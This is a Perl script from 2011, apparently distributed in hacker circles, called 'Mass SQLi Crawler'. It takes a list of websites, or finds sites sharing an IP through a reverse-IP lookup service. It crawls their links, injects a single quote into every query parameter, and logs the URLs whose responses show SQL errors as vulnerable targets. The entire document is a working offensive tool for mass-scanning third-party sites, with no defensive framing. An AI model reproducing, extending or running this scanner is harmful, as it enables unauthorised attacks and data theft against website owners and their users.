MASS SQLI CRAWLER v.1.0

1. #!/usr/bin/perl -w
2. ##########################################################################################
3. # MASS SQLI CRAWLER v.1.0                                                                #
4. # Coded by B47CHGURU on 7-07-2011                                                        #
5. # Updated on 14-08-2011                                                                  #
6. #if any bugs are found ...plz do inform me at [email protected]                   #
7. #reverse ip tool incorporated wont extract all websites.. use yougetsignal.com           #
8. #Note: You should first install HTML::LinkExtor module with CPAN shell                   #
9. #----------------------------------------------------------------------------------------#
10. #To all script kiddies..... changing the "made by" headers wont make you the coder...!!  #
11. #Respect the coderz..!!!                                                                 #
12. ##########################################################################################
13.  
14.  
15.  
16.  
17. ########################CHANGE AREAS##########################
18. $show = 0;####shows the extracted links
19.  
20. #############################################################
21.  
22.  
23.  
24. if($^O =~ /Win/){
25.  
26.    system("cls");
27.  
28. }else{
29.  
30.    system("clear");
31. }
32.  print ("\n#######################################################\n");
33.  
34.  print ("    Welcome to B47CH GURU's Mass sqli Crawler!\n");
35.  
36.  print ("########################################################\n\n\n");
37.  use LWP::UserAgent;
38.  use HTML::LinkExtor;
39.  use URI::URL;
40.  use HTTP::Request;
41. my  $i = 1;
42. my  $sql    = "'";
43. my  $locate = "";
44. my  @uri;
45. my  $count = 0;
46. my  $vul = 0;
47. my  $incount = 0;
48. my  $ua = LWP::UserAgent->new;
49. $ua->timeout (20);
50. $data='scanned.html';
51. $indicator = 'b';
52.  open (CHECKR, "<$data");
53.  
54. @CHECKED = <CHECKR>;
55. close CHECKR;
56. foreach $Post(@CHECKED) {
57. if ($Post=~/SQLI/){
58. $indicator = 'a';
59. } else {
60. }
61. }
62.  
63. open HTML, ">>", "scanned.html" or die $!;
64. if ($indicator=~/b/){
65. print HTML "<html xmlns=\"http://www.w3.org/1999/xhtml\"> \n <head> \n <title>B47CH GURU's Mass SQLI Crawler..!!</title> \n  </head>";
66. print HTML "<body id=\"#body\" body bgcolor=\"#000000\" text=\"#FFFFFF\" link=\"#FF3333\" vlink=\"#C0C0C0\" alink=\"#990000\" marginwidth=\"100\" align=\"left\"> \n";
67. print HTML "<br /> \n <center>\n <h1>B47CH GURU's Mass SQLI Crawler v.1.0..!!</h1> \n <h2>####Scan results####</h2> \n ";
68. } else {
69. print HTML "<html xmlns=\"http://www.w3.org/1999/xhtml\"> \n <head> \n <title>B47CH GURU's Mass SQLI Crawler..!!</title> \n  </head>";
70. print HTML "<body id=\"#body\" body bgcolor=\"#000000\" text=\"#FFFFFF\" link=\"#FF3333\" vlink=\"#C0C0C0\" alink=\"#990000\" marginwidth=\"100\" align=\"left\"> \n";
71. print HTML "<br /> \n <center>\n ";
72. }
73. my @imgs = ();
74.   sub reverse {
75.      my($tag, %attr) = @_;
76.      return if $tag ne 'a';
77.      push(@TARGETS, values %attr);
78.   }
79. print " Do you want to do reverseip or load website list from file..?(y/n)>";
80. my $revlist=<STDIN>;
81. if($revlist =~ /y/){
82. print "\n IP/Website you want to reverse..\? >";
83. my $website=<STDIN>;
84. chomp($website);
85. my $linds = 'http://sameip.org/ip/' . $website;
86. print (" \n ############################################## \n");
87. $url = $linds;
88.   $p = HTML::LinkExtor->new(\&reverse);
89.  
90.  
91.   $res = $ua->request(HTTP::Request->new(GET => $url),
92.                       sub {$p->parse($_[0])});
93.  
94.  
95.   my $base = $res->base;
96.   @TARGETS = map { $_ = url($_, $base)->abs; } @TARGETS;
97.   sort(@TARGETS);
98.   splice (@TARGETS, 0, 1);
99.   $asshole =$TARGETS[-1];
100.   print (" \n $asshole \n\n");
101.   if($asshole =~/nameserverspy/ | $asshole =~ /dailydomains/ | $asshole =~ /sameip/){
102.   splice (@TARGETS, -6, 6);
103.   }
104.   print join("\n", @TARGETS), "\n";
105.   print (" \n ############################################## \n\n");
106.   $linkno=$#TARGETS + 1;
107. goto loop2;
108. } else {
109. }
110.  
111.   sub callback {
112.      my($tag, %attr) = @_;
113.      return if $tag ne 'a';
114.      push(@imgs, values %attr);
115.   }
116.  
117.  
118.   print " Path to your website scan list. >";
119. my $list=<STDIN>;
120. chomp($list);
121.   open (THETARGET, "<$list") || die "[-] Can't open the Website list !";
122. @TARGETS = <THETARGET>;
123. close THETARGET;
124. $linkno=$#TARGETS + 1;
125. loop2:  foreach $linds(@TARGETS){
126.  
127. @imgs = ();
128. print ("\n");
129. print ("\n");
130. print join("\n", @imgs), "\n";
131. $incount = 0;
132.   chomp($linds);
133.  
134. $thelind = $linds;
135. $thelind = clear($thelind);
136. $thelind = trim($thelind);
137. $url = $thelind;
138.   $p = HTML::LinkExtor->new(\&callback);
139.  
140.  
141.   $res = $ua->request(HTTP::Request->new(GET => $url),
142.                       sub {$p->parse($_[0])});
143.  
144.  
145.   my $base = $res->base;
146.   @imgs = map { $_ = url($_, $base)->abs; } @imgs;
147. sort(@imgs);
148. $linkdo=$#imgs + 1;
149. if ($show =~ /1/){
150. print join("\n", @imgs), "\n";
151. }
152. print("\n ------------------------------------------------------------- \n   Scanning for vulnerabilities in $url \n ------------------------------------------------------------- \n");
153.  
154. sqli();
155. @imgs = ();
156. print ("\n");
157. print ("\n");
158. print join("\n", @imgs), "\n";
159. $incount = 0
160. }
161. # Scanning
162. sub sqli{
163. loop: foreach $path(@imgs){
164. chomp($path);
165. $webcl=$path;
166. $webcl = trim($webcl);
167. if($webcl=~/$url/){
168. } else {
169. next loop;
170. }
171. $url = $webcl;
172. if($url=~/com_content/ | $url=~/mailto/){
173. next loop;
174.     }
175.  if($url=~/=/){
176.  
177.     } else {
178.     next loop;
179.     }
180.     $incount=$incount+1;
181.  
182. if($incount=~/36/){
183. next loop2;
184. }
185. if ($url =~ m/=/sim) {
186.  $url =~ s/=/='/g;
187.  
188. } else {
189.  
190. }
191. print "\n $url";
192.    
193.     my  $req = HTTP::Request->new( GET => $url );
194.     my  $response = $ua->request( $req );
195.     if( $response->content =~ /SQL/ || $response->content =~ /\/var\/www\//) {
196.         open OUTFILE, ">>", "scanned.txt" or die $!;
197.         print OUTFILE "$url \n";
198.         if(($count+1)%2) {
199.             print HTML "\t\t\n<tr><td><a href=\"$url\"><font color=\"#66FF66\"><strong>$url</strong></font></a> \n </br> \n </br> \n";
200.         } else {
201.             print HTML "\t\t\n<tr><td><a href=\"$url\"><font color=\"#66FF66\"><strong>$url</strong></font></a> \n </br> \n </br> \n";
202.         }
203.         $count++;
204.         print "\n [+]", $url, "(",$count,"/",$incount,")";
205.        
206.         close OUTFILE;
207.        
208.     } else {
209.        
210.     }
211. }
212.  
213.  
214. print "\n\n $count vulnerable links found in $linds. Extracted link count: $linkdo \n";
215.  
216. }
217. sub clear{
218.  
219.    $website = shift;
220.  
221.    if($website !~ /^http/){
222.  
223.       $website = 'http://www.' . $website;
224.  
225.    }
226.  
227.    
228.  
229.    return $website;
230.  
231. }
232.  
233. sub trim{
234.   $string = shift;
235.   $string =~ s/^\s+//;            
236.   $string =~ s/\s+$//;
237.   return $string;        
238. }
239. print ("\n\n Successfully scanned $linkno websites. View results in: 'scanned.html'.\n");
240. print HTML "\n </center>\n </body> \n </html>";
241. close HTML;
242.  
243. if($^O =~ /Win/){
244.  
245.    system('.\scanned.html');
246.  
247. }else{
248.  
249.    system('./scanned.html');
250.  
251. }